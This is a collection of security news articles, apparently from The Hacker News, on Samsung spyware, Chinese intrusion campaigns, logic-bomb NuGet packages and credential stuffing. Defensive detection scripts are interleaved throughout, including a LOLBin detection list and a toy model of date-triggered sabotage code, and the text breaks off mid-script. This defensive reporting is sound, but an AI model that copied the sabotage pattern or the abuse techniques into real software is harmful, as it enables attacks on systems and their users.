Category: Cybersecurity

  • Samsung Mobile Flaw Exploited as Zero-Day to Deploy LANDFALL Android Spyware

    Samsung Mobile Flaw Exploited as Zero-Day to Deploy LANDFALL Android Spyware

    A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a “commercial-grade” Android spyware dubbed LANDFALL in targeted attacks in the Middle East.

    The activity involved the exploitation of CVE-2025-21042 (CVSS score: 8.8), an out-of-bounds write flaw in the “libimagecodec.quram.so” component that could allow remote attackers to execute arbitrary code, according to Palo Alto Networks Unit 42. The issue was addressed by Samsung in April 2025.

    “This vulnerability was actively exploited in the wild before Samsung patched it in April 2025, following reports of in-the-wild attacks,” Unit 42 said. Potential targets of the activity, tracked as CL-UNK-1054, are located in Iraq, Iran, Turkey, and Morocco based on VirusTotal submission data.

    The development comes as Samsung disclosed in September 2025 that another flaw in the same library (CVE-2025-21043, CVSS score: 8.8) had also been exploited in the wild as a zero-day. There is no evidence of this security flaw being weaponized in the LANDFALL campaign. Samsung did not immediately respond to a request for comment.

    The attacks are assessed to have involved malicious images sent over WhatsApp as DNG (Digital Negative) files, with LANDFALL samples going back as far as July 23, 2024. This is based on DNG artifacts bearing names such as “WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg” and “IMG-20240723-WA0000.jpg,” which follow WhatsApp’s naming conventions for received media.

    Itay Cohen, senior principal researcher at Palo Alto Networks Unit 42, told The Hacker News that they have not observed any significant functional changes between the samples from July 2024 and February 2025, when the most recent LANDFALL artifact was uploaded to VirusTotal.

    LANDFALL, once installed and executed, acts as a comprehensive spy tool, capable of harvesting sensitive data, including microphone recording, location, photos, contacts, SMS, files, and call logs.

    While Unit 42 said the exploit chain may have involved a zero-click approach that triggers CVE-2025-21042 without any user interaction, there are currently no indications that this happened, nor any evidence of an unknown security issue in WhatsApp that would support the hypothesis.

    The Android spyware is specifically designed to target Samsung’s Galaxy S22, S23, and S24 series devices, as well as Z Fold 4 and Z Flip 4, covering some of the flagship devices from the South Korean electronics chaebol, with the exception of the latest generation.

    Flowchart for LANDFALL spyware

    It’s worth noting that around the same time WhatsApp disclosed that a flaw in its messaging app for iOS and macOS (CVE-2025-55177, CVSS score: 5.4) was chained with CVE-2025-43300 (CVSS score: 8.8), a flaw in Apple iOS, iPadOS, and macOS, to target fewer than 200 users as part of a sophisticated campaign. Apple and WhatsApp have since patched the flaws.

    Timeline for recent malicious DNG image files and associated exploit activity

    Unit 42’s analysis of the discovered DNG files shows that each carries a ZIP archive appended to the end of the file; the exploit extracts a shared object library from that archive and runs it to launch the spyware. The archive also holds a second shared object designed to manipulate the device’s SELinux policy, granting LANDFALL elevated permissions and helping it persist.
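    The appended-archive layout described above is cheap to check for at scale, since DNG is a TIFF container and a ZIP glued onto the end leaves its End of Central Directory record in the trailing bytes. The script below is an added example written for this page, not Unit 42’s tooling; it builds a constructed sample (a minimal TIFF plus a ZIP holding two fake `.so` entries), then reports whether a file looks like a TIFF, where the appended archive begins, and which entries are shared objects.

```python
"""Flag image files that carry a ZIP archive appended after the image data.

Added example, not Unit 42's tooling. DNG is a TIFF container, so a well-formed
file starts with a TIFF byte-order mark; a ZIP glued onto the end leaves an End
of Central Directory (EOCD) record in the trailing bytes, and the offsets inside
the archive are relative to where the ZIP data begins, not to the file start.
The sample file and its entry names are constructed for the demo.
"""
import io
import struct
import zipfile

TIFF_MAGICS = (b"II*\x00", b"MM\x00*")
EOCD_SIG = b"PK\x05\x06"
EOCD_MIN = 22          # fixed-size part of the EOCD record
MAX_COMMENT = 0xFFFF   # the EOCD may be followed by a comment of up to 64 KiB


def find_eocd(data: bytes) -> int:
    """Offset of the EOCD record, or -1 if the file has no ZIP tail."""
    tail_start = max(0, len(data) - EOCD_MIN - MAX_COMMENT)
    pos = data.rfind(EOCD_SIG, tail_start)
    return pos if pos >= 0 and pos + EOCD_MIN <= len(data) else -1


def analyse_image(data: bytes) -> dict:
    """Describe the TIFF/DNG header and any ZIP archive appended to it."""
    result = {"is_tiff": data[:4] in TIFF_MAGICS, "zip_start": None,
              "entries": [], "shared_objects": []}
    eocd = find_eocd(data)
    if eocd < 0:
        return result
    # EOCD: sig, disk, cd_disk, entries_here, entries_total, cd_size, cd_offset, comment_len
    fields = struct.unpack("<IHHHHIIH", data[eocd:eocd + EOCD_MIN])
    cd_size, cd_offset = fields[5], fields[6]
    # The central-directory offset is relative to the ZIP's own start, so the
    # appended data must begin where that directory would otherwise have to.
    zip_start = eocd - cd_size - cd_offset
    if zip_start < 0 or data[zip_start:zip_start + 4] != b"PK\x03\x04":
        return result          # not a plain appended archive; leave for manual triage
    result["zip_start"] = zip_start
    with zipfile.ZipFile(io.BytesIO(data)) as zf:   # zipfile tolerates the image prefix
        result["entries"] = zf.namelist()
    result["shared_objects"] = [n for n in result["entries"] if n.endswith(".so")]
    return result


def build_sample() -> bytes:
    """Constructed input: a minimal little-endian TIFF with a ZIP glued on the end."""
    tiff = b"II*\x00" + struct.pack("<I", 8)             # header, first IFD at offset 8
    tiff += struct.pack("<H", 0) + struct.pack("<I", 0)  # empty IFD, no next IFD
    tiff += b"\x00" * 64                                 # stand-in for pixel data
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("loader.so", b"\x7fELF" + b"\x00" * 32)        # fake ELF payloads
        zf.writestr("policy_patch.so", b"\x7fELF" + b"\x00" * 32)
    return tiff + buf.getvalue()


if __name__ == "__main__":
    print(analyse_image(build_sample()))
```

    A TIFF that also parses as a ZIP is not proof of exploitation on its own, but combined with `.so` entries and a messaging-app file name it is a strong triage signal; the check runs on the raw bytes, so it can sit in a mail or messaging gateway without an image decoder being involved.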

    The shared object that loads LANDFALL also communicates with a command-and-control (C2) server over HTTPS to enter into a beaconing loop and receive unspecified next-stage payloads for subsequent execution.

    “At this point, we can’t share details about the next-stage payloads delivered from the C2 server,” Cohen said. “What we can say is that LANDFALL is a modular spyware framework — the loader we analyzed is clearly designed to fetch and execute additional components from the C2 infrastructure. Those later stages likely extend its surveillance and persistence capabilities, but they weren’t recovered in the samples available to us.”

    It’s currently not known who is behind the spyware or the campaign. That said, Unit 42 said LANDFALL’s C2 infrastructure and domain registration patterns dovetail with that of Stealth Falcon (aka FruityArmor), although, as of October 2025, no direct overlaps between the two clusters have been detected.

    The findings suggest that the delivery of LANDFALL is likely part of a broader DNG exploitation wave that also hit iPhones via the exploit chains mentioned above. They also highlight how sophisticated exploits can sit in public repositories for extended periods, flying under the radar until they are fully analyzed.

    “We don’t believe this specific exploit is still being used, since Samsung patched it in April 2025,” Cohen said. “However, related exploit chains affecting Samsung and iOS devices were observed as recently as August and September, indicating that similar campaigns remained active until very recently. Some infrastructure that might be related to LANDFALL also remains online, which could suggest ongoing or follow-on activity by the same operators.”

    (The story was updated after publication to clarify details surrounding the use of WhatsApp as a distribution vector for the malware and additional insights from Unit 42.)


    Source: thehackernews.com…

  • From Log4j to IIS, China’s Hackers Turn Legacy Bugs into Global Espionage Tools

    From Log4j to IIS, China’s Hackers Turn Legacy Bugs into Global Espionage Tools

    A China-linked threat actor has been attributed to a cyber attack targeting a U.S. non-profit organization with the aim of establishing long-term persistence, as part of broader activity aimed at U.S. entities linked to or involved in policy issues.

    The organization, according to a report from Broadcom’s Symantec and Carbon Black teams, is “active in attempting to influence U.S. government policy on international issues.” The attackers managed to gain access to the network for several weeks in April 2025.

    The first sign of activity occurred on April 5, 2025, when mass scanning was detected against a server, leveraging various well-known exploits, including CVE-2022-26134 (Atlassian), CVE-2021-44228 (Apache Log4j), CVE-2017-9805 (Apache Struts), and CVE-2017-17562 (GoAhead Web Server).

    No further actions were recorded until April 16, when the attackers executed several curl commands to test internet connectivity, followed by the Windows command-line tool netstat to enumerate network connections and configuration. They then set up persistence on the host by means of a scheduled task.

    The task was designed to execute the legitimate Microsoft binary “msbuild.exe” to run an unknown payload, and to create a second scheduled task configured to run every 60 minutes as the high-privileged SYSTEM user.

    This new task, Symantec and Carbon Black said, was capable of loading and injecting unknown code into “csc.exe” that ultimately established communications with a command-and-control (C2) server (“38.180.83[.]166”). Subsequently, the attackers were observed executing a custom loader to unpack and run an unspecified payload, likely a remote access trojan (RAT) in memory.
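    The persistence pattern above (a scheduled task that runs a signed Microsoft build tool as SYSTEM on a short repeat interval) is visible in Windows Security event 4698, which carries the task’s XML definition. The script below is an added example written for this page, not Symantec’s or Carbon Black’s detection content; it scores constructed task definitions on the traits the report describes (LOLBin action, SYSTEM principal, repetition of an hour or less, hidden flag) and flags tasks that hit more than one. The task names and command paths are illustrative.

```python
"""Triage Task Scheduler definitions for the persistence pattern described above.

Added example (not Symantec's detection content). Windows logs a new scheduled
task as Security event 4698 and embeds the task XML in the event. The two task
definitions below are constructed: one mirrors the report's pattern (msbuild.exe,
SYSTEM, every 60 minutes), the other is a benign per-user updater.
"""
import re
import xml.etree.ElementTree as ET

# Signed Microsoft binaries commonly abused to run attacker code (ATT&CK T1127, T1218)
LOLBINS = {"msbuild.exe", "csc.exe", "installutil.exe", "regsvr32.exe",
           "mshta.exe", "rundll32.exe", "regasm.exe", "regsvcs.exe"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}


def _local(tag: str) -> str:
    """Strip the XML namespace that Task Scheduler puts on every element."""
    return tag.rsplit("}", 1)[-1]


def _text(root, name: str):
    """Text of the first element with the given local name, or None."""
    for el in root.iter():
        if _local(el.tag) == name and el.text:
            return el.text.strip()
    return None


def interval_seconds(iso_duration: str) -> int:
    """Parse the PnDTnHnMnS form used by <Interval>; unknown forms count as 0."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso_duration)
    if not m:
        return 0
    d, h, mi, s = (int(x or 0) for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def score_task(task_xml: str) -> list:
    """Return the reasons a task definition looks like attacker persistence."""
    root = ET.fromstring(task_xml)
    reasons = []
    command = (_text(root, "Command") or "").lower()
    exe = command.replace("/", "\\").rsplit("\\", 1)[-1].strip('"')
    if exe in LOLBINS:
        reasons.append(f"action runs LOLBin {exe}")
    if (_text(root, "UserId") or "").lower() in SYSTEM_IDS:
        reasons.append("runs as SYSTEM")
    interval = _text(root, "Interval")
    if interval and 0 < interval_seconds(interval) <= 3600:
        reasons.append(f"repeats every {interval}")
    if _text(root, "Hidden") == "true":
        reasons.append("task hidden from the UI")
    return reasons


def triage(events: list) -> dict:
    """Map task name -> reasons for every 4698 record that scores at least two hits."""
    flagged = {}
    for ev in events:
        reasons = score_task(ev["TaskContent"])
        if len(reasons) >= 2:
            flagged[ev["TaskName"]] = reasons
    return flagged


NS = 'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"'
SAMPLE_EVENTS = [  # constructed 4698 records, reduced to the two fields used here
    {"TaskName": "\\Microsoft\\Windows\\UpdateCheck", "TaskContent": f"""
<Task {NS}>
  <Triggers><TimeTrigger><Repetition><Interval>PT60M</Interval></Repetition></TimeTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions><Exec>
    <Command>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe</Command>
    <Arguments>C:\\ProgramData\\cache\\build.proj</Arguments>
  </Exec></Actions>
</Task>"""},
    {"TaskName": "\\OneDrive Standalone Update", "TaskContent": f"""
<Task {NS}>
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-21-1004-513-1107</UserId></Principal></Principals>
  <Actions><Exec><Command>C:\\Users\\sarah\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe</Command></Exec></Actions>
</Task>"""},
]

if __name__ == "__main__":
    for name, why in triage(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(why))
```

    Requiring two hits keeps a lone `msbuild.exe` task from a developer box out of the alert queue; the `Arguments` value (here a `.proj` file under `ProgramData`) is the next thing to pull, since that is where the inline-task payload lives.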

    Also observed was the execution of the legitimate Vipre AV component (“vetysafe.exe”) to sideload a DLL loader (“sbamres.dll”). This component is also said to have been used for DLL side-loading in connection with Deed RAT (aka Snappybee) in prior activity attributed to Salt Typhoon (aka Earth Estries), and in attacks attributed to Earth Longzhi, a sub-cluster of APT41.

    “A copy of this malicious DLL was previously used in attacks linked to the China-based threat actors known as Space Pirates,” Broadcom said. “A variant of this component, with a different filename, was also used by the Chinese APT group Kelp (aka Salt Typhoon) in a separate incident.”

    Some of the other tools observed in the targeted network included Dcsync and Imjpuexc. It’s not clear how successful the attackers were in their efforts. No additional activity was registered after April 16, 2025.

    “It is clear from the activity on this victim that the attackers were aiming to establish a persistent and stealthy presence on the network, and they were also very interested in targeting domain controllers, which could potentially allow them to spread to many machines on the network,” Symantec and Carbon Black said.

    “The sharing of tools among groups has been a long-standing trend among Chinese threat actors, making it difficult to say which specific group is behind a set of activities.”

    The disclosure comes as a security researcher who goes by the online moniker BartBlaze disclosed Salt Typhoon’s exploitation of a security flaw in WinRAR (CVE-2025-8088) to initiate an attack chain that sideloads a DLL responsible for running shellcode on the compromised host. The final payload is designed to establish contact with a remote server (“mimosa.gleeze[.]com”).

    Activity from Other Chinese Hacking Groups

    According to a report from ESET, China-aligned groups have continued to remain active, striking entities across Asia, Europe, Latin America, and the U.S. to serve Beijing’s geopolitical priorities. Some of the notable campaigns include –

    • The targeting of the energy sector in Central Asia by a threat actor codenamed Speccom in July 2025 via phishing emails to deliver a variant of BLOODALCHEMY and custom backdoors such as kidsRAT and RustVoralix.
    • The targeting of European organizations by a threat actor codenamed DigitalRecyclers in July 2025, using an unusual persistence technique that involved the use of the Magnifier accessibility tool to gain SYSTEM privileges.
    • The targeting of governmental entities in Latin America (Argentina, Ecuador, Guatemala, Honduras, and Panama) between June and September 2025 by a threat actor codenamed FamousSparrow that likely exploited ProxyLogon flaws in Microsoft Exchange Server to deploy SparrowDoor.
    • The targeting of a Taiwanese company in the defense aviation sector, a U.S. trade organization based in China, and the China-based offices of a Greek governmental entity, and an Ecuadorian government body between May and September 2025 by a threat actor codenamed SinisterEye (aka LuoYu and Cascade Panda) to deliver malware like WinDealer (for Windows) and SpyDealer (for Android) using adversary-in-the-middle (AitM) attacks to hijack legitimate software update mechanisms.
    • The targeting of a Japanese company and a multinational enterprise, both in Cambodia, in June 2025 by a threat actor codenamed PlushDaemon by means of AitM poisoning to deliver SlowStepper.

    “PlushDaemon achieves AitM positioning by compromising network devices such as routers, and deploying a tool that we have named EdgeStepper, which redirects DNS traffic from the targeted network to a remote, attacker-controlled DNS server,” ESET said.

    “This server responds to queries for domains associated with software update infrastructure with the IP address of the web server that performs the update hijacking and ultimately serves PlushDaemon’s flagship backdoor, SlowStepper.”

    Chinese Hacking Groups Target Misconfigured IIS Servers

    In recent months, threat hunters have also spotted a Chinese-speaking threat actor targeting misconfigured IIS servers using publicly exposed machine keys to install a backdoor called TOLLBOOTH (aka HijackServer) that comes with SEO cloaking and web shell capabilities.

    “REF3927 abuses publicly disclosed ASP.NET machine keys to compromise IIS servers and deploy TOLLBOOTH SEO cloaking modules globally,” Elastic Security Labs researchers said in a report published late last month. Per HarfangLab, the operation has infected hundreds of servers around the world, with infections concentrated in India and the U.S.
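    A machineKey copied from documentation or a forum is the root cause in the campaign above: whoever knows the validationKey and decryptionKey can forge a signed ViewState and run code in the IIS worker process. The script below is an added example for this page, not Elastic’s or HarfangLab’s tooling; it parses a constructed web.config, reports why its machineKey is dangerous (explicit keys, template placeholders, short keys, legacy SHA1/3DES), and emits a freshly generated element. Comparing found keys against the public-key lists your team maintains is left out, as no such list is on this page.

```python
"""Audit a web.config <machineKey> and generate a rotated replacement.

Added example, not Elastic's or HarfangLab's tooling. The weakness the report
describes is a machineKey whose values came from public documentation or forums.
This script flags explicit keys, placeholder text, undersized keys and legacy
algorithms, then produces a fresh element. The web.config below is constructed.
"""
import secrets
import xml.etree.ElementTree as ET

LEGACY_VALIDATION = {"md5", "sha1", "3des", "aes"}   # keep HMACSHA256 or stronger
LEGACY_DECRYPTION = {"des", "3des"}
PLACEHOLDER_MARKERS = ("sample", "example", "your", "xxxx")  # copy-paste tells


def audit_machine_key(web_config_xml: str) -> list:
    """Return human-readable findings for the first <machineKey> element."""
    root = ET.fromstring(web_config_xml)
    mk = root.find(".//machineKey")
    if mk is None:
        return ["no explicit <machineKey>: keys are auto-generated per server "
                "(fine on a single box; a web farm needs unique shared keys)"]
    findings = []
    vkey = mk.get("validationKey", "AutoGenerate,IsolateApps")
    dkey = mk.get("decryptionKey", "AutoGenerate,IsolateApps")
    explicit = [(n, k) for n, k in (("validationKey", vkey), ("decryptionKey", dkey))
                if not k.startswith("AutoGenerate")]
    if explicit:
        findings.append("explicit keys present: treat them as secrets and rotate them if they "
                        "ever appeared in docs, forums, tickets or source control")
    for name, key in explicit:
        if any(m in key.lower() for m in PLACEHOLDER_MARKERS):
            findings.append(f"{name} contains placeholder text; it was copied from a template")
        if name == "validationKey" and len(key) < 128:
            findings.append("validationKey shorter than 64 bytes; HMACSHA256 wants 128 hex chars")
        if name == "decryptionKey" and len(key) < 64:
            findings.append("decryptionKey shorter than 32 bytes; AES-256 wants 64 hex chars")
    if mk.get("validation", "HMACSHA256").lower() in LEGACY_VALIDATION:
        findings.append(f"validation={mk.get('validation')} is legacy; use HMACSHA256")
    if mk.get("decryption", "Auto").lower() in LEGACY_DECRYPTION:
        findings.append(f"decryption={mk.get('decryption')} is legacy; use AES")
    return findings


def new_machine_key() -> dict:
    """Fresh random keys, sized as IIS Manager's 'Generate Keys' produces them."""
    return {"validationKey": secrets.token_hex(64).upper(),   # 64 bytes
            "decryptionKey": secrets.token_hex(32).upper(),   # 32 bytes
            "validation": "HMACSHA256", "decryption": "AES"}


def render_machine_key(keys: dict) -> str:
    """Serialize a key set as the element to drop into web.config."""
    return ('<machineKey validationKey="{validationKey}" decryptionKey="{decryptionKey}" '
            'validation="{validation}" decryption="{decryption}" />').format(**keys)


# Constructed web.config: the keys look like they came straight out of a tutorial.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="EXAMPLE0123456789ABCDEF0123456789ABCDEF00"
                decryptionKey="EXAMPLE0123456789ABCDEF0"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for finding in audit_machine_key(SAMPLE_WEB_CONFIG):
        print("-", finding)
    print(render_machine_key(new_machine_key()))
```

    Rotating the key invalidates outstanding ViewState and forms-authentication tickets, so roll it across every node of a farm at once and expect users to sign in again; if the server was already running TOLLBOOTH, rotation alone does not remove the module or the web shell it dropped.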

    The attacks are also characterized by attempts to weaponize the initial access to drop the Godzilla web shell, execute GotoHTTP remote access tool, use Mimikatz to harvest credentials, and deploy HIDDENDRIVER, a modified version of the open source rootkit Hidden, to conceal the presence of malicious payloads on the infected machine.

    It’s worth pointing out that the cluster is the latest addition to a long list of Chinese threat actors, such as GhostRedirector, Operation Rewrite, and UAT-8099, that have targeted IIS servers, indicating a surge in such activity.

    “While the malicious operators appear to be using Chinese as their main language and leveraging the compromises to support search engine optimization (SEO), we notice that the deployed module offers a persistent and unauthenticated channel which allows any party to remotely execute commands on affected servers,” the French cybersecurity company said.


    Source: thehackernews.com…

  • Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

    Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

    Nov 07, 2025Ravie LakshmananSupply Chain Attack / Malware

    A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems.

    According to software supply chain security company Socket, the packages were published in 2023 and 2024 by a user named “shanhai666” and are designed to run malicious code after specific trigger dates in August 2027 and November 2028. The packages were collectively downloaded 9,488 times.

    “The most dangerous package, Sharp7Extend, targets industrial PLCs with dual sabotage mechanisms: immediate random process termination and silent write failures that begin 30-90 minutes after installation, affecting safety-critical systems in manufacturing environments,” security researcher Kush Pandya said.

    The list of malicious packages is below –

    • MyDbRepository (Last updated on May 13, 2023)
    • MCDbRepository (Last updated on June 5, 2024)
    • Sharp7Extend (Last updated on August 14, 2024)
    • SqlDbRepository (Last updated on October 24, 2024)
    • SqlRepository (Last updated on October 25, 2024)
    • SqlUnicornCoreTest (Last updated on October 26, 2024)
    • SqlUnicornCore (Last updated on October 26, 2024)
    • SqlUnicorn.Core (Last updated on October 27, 2024)
    • SqlLiteRepository (Last updated on October 28, 2024)

    Socket said all nine rogue packages work as advertised, allowing the threat actors to build trust among downstream developers, who may install them without realizing they embed a logic bomb scheduled to detonate in the future.

    The threat actor has been found to have published a total of 12 packages, with the remaining three working as intended without any malicious functionality. All of them have been removed from NuGet. Sharp7Extend, the company added, is designed to target users of the legitimate Sharp7 library, a .NET implementation for communicating with Siemens S7 programmable logic controllers (PLCs).

    Bundling the legitimate Sharp7 library gives the package an air of trustworthiness, but the package stealthily inserts malicious code into every database query or PLC operation by exploiting C# extension methods.

    “Extension methods allow developers to add new methods to existing types without modifying the original code – a powerful C# feature that the threat actor weaponizes for interception,” Pandya explained. “Each time an application executes a database query or PLC operation, these extension methods automatically execute, checking the current date against trigger dates (hardcoded in most packages, encrypted configuration in Sharp7Extend).”

    Once a trigger date has passed, the malware terminates the entire application process with a 20% probability on each intercepted call. In the case of Sharp7Extend, the malicious logic is activated immediately after installation and continues until June 6, 2028, when the termination mechanism stops by itself.

    The package also sabotages write operations to the PLC 80% of the time after a randomized delay of between 30 and 90 minutes. This means that both triggers, the random process terminations and the write failures, operate in tandem once the grace period elapses.

    Certain SQL Server, PostgreSQL, and SQLite implementations associated with other packages, on the other hand, are set to trigger on August 8, 2027, (MCDbRepository) and November 29, 2028 (SqlUnicornCoreTest and SqlUnicornCore).

    “This staggered approach gives the threat actor a longer window to collect victims before the delayed-activation malware triggers, while immediately disrupting industrial control systems,” Pandya said.
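    A dependency that only misbehaves after a future date, and then only on a fraction of calls, will pass every test run before the trigger. One way to surface it is to drive the suspect code under a controllable clock and compare failure rates across dates, including the days on either side of any hardcoded trigger you find. The block below is an added example for this page in Python (the packages in the report are C#), not Socket’s code: `SuspectRepository` is a constructed model of the reported mechanism, using the August 8, 2027 date reported for MCDbRepository, and `probe` is the time-travel harness.

```python
"""Probe a dependency for date-gated sabotage by running it under a fake clock.

Added example in Python (the report's packages are C#; this is not Socket's
code). SuspectRepository is a constructed model of the reported mechanism:
every query compares the current date with a hardcoded trigger and, once the
date has passed, ends the process 20% of the time so failures look like random
crashes. probe() swaps the clock, drives the same call hundreds of times per
date, and reports the failure rate at each date.
"""
import datetime as dt
import random
import sys

_CLOCK = {"now": dt.date.today}   # indirection so the probe can time-travel


def today() -> dt.date:
    return _CLOCK["now"]()


class SuspectRepository:
    """Constructed stand-in for a booby-trapped data-access package."""
    TRIGGER = dt.date(2027, 8, 8)   # date reported for MCDbRepository

    def __init__(self, rng: random.Random):
        self.rng = rng

    def query(self, sql: str) -> str:
        # Runs on every call, exactly where a C# extension method would sit.
        if today() > self.TRIGGER and self.rng.random() < 0.20:
            sys.exit(1)                      # looks like an unexplained crash
        return f"rows for {sql!r}"


def probe(make_target, dates, trials=500, seed=1234) -> dict:
    """Failure rate of target.query() per simulated date; the clock is restored afterwards."""
    rates = {}
    original = _CLOCK["now"]
    try:
        for day in dates:
            _CLOCK["now"] = lambda d=day: d
            target = make_target(random.Random(seed))   # same RNG stream at every date
            failures = 0
            for _ in range(trials):
                try:
                    target.query("SELECT 1")
                except (SystemExit, Exception):        # sys.exit() is not an Exception
                    failures += 1
            rates[day] = failures / trials
    finally:
        _CLOCK["now"] = original
    return rates


def date_gated(rates: dict, tolerance: float = 0.0) -> bool:
    """True when the failure rate differs between probe dates beyond the tolerance."""
    return max(rates.values()) - min(rates.values()) > tolerance


def clock_is_real() -> bool:
    """Sanity check that probe() put the real clock back."""
    return today() == dt.date.today()


# Probe the present, both sides of the reported trigger, and well past it.
PROBE_DATES = [dt.date(2025, 11, 7), dt.date(2027, 8, 7),
               dt.date(2027, 8, 9), dt.date(2028, 12, 1)]

if __name__ == "__main__":
    rates = probe(SuspectRepository, PROBE_DATES)
    for day, rate in rates.items():
        print(day, f"{rate:.1%} of calls crashed")
    print("date-gated:", date_gated(rates))
```

    In a real .NET build the clock is swapped by faking the system time in a disposable VM or container rather than by patching a module, but the logic is the same: the probe dates should include today, the day before and after each date literal found in the decompiled assembly, and a point several years out to catch triggers you did not find.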

    It’s currently not known who is behind the supply chain attack, but Socket said source code analysis and the choice of the name “shanhai666” suggest that it may be the work of a threat actor, possibly of Chinese origin.

    “This campaign demonstrates sophisticated techniques rarely combined in NuGet supply chain attacks,” the company concluded. “Developers who installed packages in 2024 will have moved to other projects or companies by 2027-2028 when the database malware triggers, and the 20% probabilistic execution disguises systematic attacks as random crashes or hardware failures.”

    “This makes incident response and forensic investigation nearly impossible, organizations cannot trace the malware back to its introduction point, identify who installed the compromised dependency, or establish a clear timeline of compromise, effectively erasing the attack’s paper trail.”


    Source: thehackernews.com…

  • Enterprise Credentials at Risk – Same Old, Same Old?

    Enterprise Credentials at Risk – Same Old, Same Old?

    Nov 07, 2025The Hacker NewsData Protection / Cloud Security

    Imagine this: Sarah from accounting gets what looks like a routine password reset email from your organization’s cloud provider. She clicks the link, types in her credentials, and goes back to her spreadsheet. But unknown to her, she’s just made a big mistake. Sarah just accidentally handed over her login details to cybercriminals who are laughing all the way to their dark web marketplace, where they’ll sell her credentials for about $15. Not much as a one-off, but a serious money-making operation when scaled up.

    The credential compromise lifecycle

    1. Users create credentials: With dozens of standalone business apps, each with its own login, your employees must create numerous accounts. But keeping track of multiple unique usernames/passwords is a pain, so they reuse passwords or make tiny variations.
    2. Hackers compromise credentials: Attackers snag these credentials through phishing, brute force attacks, third-party breaches, or exposed API keys. And many times, nobody even notices that it’s happened.
    3. Hackers aggregate and monetize credentials: Criminal networks dump stolen credentials into massive databases, then sell them on underground markets. Hackers sell your company’s login details to the highest bidder.
    4. Hackers distribute and weaponize credentials: Buyers spread these credentials across criminal networks. Bots test them against every business app they can find, while human operators cherry-pick the most valuable targets.
    5. Hackers actively exploit credentials: Successful logins let attackers dig in, escalate privileges, and start their real work — data theft, ransomware, or whatever pays best. By the time you notice weird login patterns or unusual network activity, they could have already been inside for days, weeks, or even longer.

    Common compromise vectors

    Criminals have no shortage of ways to get their hands on your company’s user credentials:

    • Phishing campaigns: Attackers craft fake emails that look legit — complete with stolen company logos and convincing copy. Even your most security-conscious employees can be fooled by these sophisticated scams.
    • Credential stuffing: Attackers grab passwords from old breaches, then test them everywhere. A 0.1% hacking success rate may sound tiny, but with rampant password reuse and the fact that hackers are testing millions of credentials per hour, it quickly adds up.
    • Third-party breaches: When LinkedIn gets hacked, attackers don’t just target LinkedIn users — they test those same credentials against all kinds of other business apps. Your company may have the most robust security in the world, but you’re still vulnerable if users are reusing credentials.
    • Leaked API keys: Developers accidentally publish credentials in GitHub repos, config files, and documentation. Automated bots scan for these 24/7, scooping them up within minutes.
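    The credential-stuffing vector above has a distinctive shape in authentication logs: one source trying a single stolen password per account across many accounts, failing almost every time, with the rare success being the account takeover that matters. The script below is an added example for this page, not part of the contributed article or Outpost24’s tooling; it parses constructed log lines in a made-up `key=value` format (documentation IP ranges, example.com users), profiles each source IP, and alerts on sources that spray many accounts with a high failure rate, listing the accounts where a login succeeded.

```python
"""Spot credential stuffing in authentication logs by source fan-out.

Added example, not part of the original article or Outpost24's tooling. A
stuffing source tries one stolen password per account across many accounts, so
its signature is many distinct usernames from one origin with a failure rate
near 100%; the rare success is the account takeover to act on. The log lines
are constructed, use documentation address ranges, and follow a made-up format.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def profile_sources(events) -> dict:
    """Aggregate attempts, failures, distinct users and successful logins per source IP."""
    stats = defaultdict(lambda: {"attempts": 0, "fails": 0, "users": set(), "hits": []})
    for e in events:
        s = stats[e["ip"]]
        s["attempts"] += 1
        s["users"].add(e["user"])
        if e["result"] == "FAIL":
            s["fails"] += 1
        else:
            s["hits"].append(e["user"])
    return stats


def detect_stuffing(lines, min_users=10, min_fail_rate=0.8) -> dict:
    """Return alerts for sources that spray many accounts and almost always fail.

    The thresholds are starting points; tune them to your login volume. A real
    operator spreads attempts over proxies, so also aggregate on ASN, TLS
    fingerprint or User-Agent once the per-IP rule stops firing.
    """
    alerts = {}
    for ip, s in profile_sources(parse(lines)).items():
        fail_rate = s["fails"] / s["attempts"]
        if len(s["users"]) >= min_users and fail_rate >= min_fail_rate:
            alerts[ip] = {"attempts": s["attempts"], "distinct_users": len(s["users"]),
                          "fail_rate": round(fail_rate, 3),
                          "compromised": sorted(s["hits"])}   # these need a forced reset
    return alerts


def build_sample() -> list:
    """Constructed log: one source walking a breach list, plus a real user's typos."""
    lines = []
    for i in range(40):
        user = f"user{i:02d}@example.com"
        result = "OK" if i == 17 else "FAIL"        # one reused password worked
        lines.append(f"2025-11-07T09:{i:02d}:00Z ip=203.0.113.5 user={user} result={result}")
    lines += [
        "2025-11-07T09:05:10Z ip=198.51.100.20 user=sarah@example.com result=FAIL",
        "2025-11-07T09:05:25Z ip=198.51.100.20 user=sarah@example.com result=FAIL",
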